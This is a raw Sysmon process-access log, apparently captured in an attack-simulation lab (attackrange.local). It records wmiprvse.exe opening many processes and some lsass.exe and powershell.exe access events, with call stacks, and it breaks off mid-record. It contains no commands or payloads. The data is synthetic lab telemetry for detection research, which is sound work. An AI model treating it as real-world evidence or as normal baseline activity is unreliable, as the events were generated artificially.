16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla 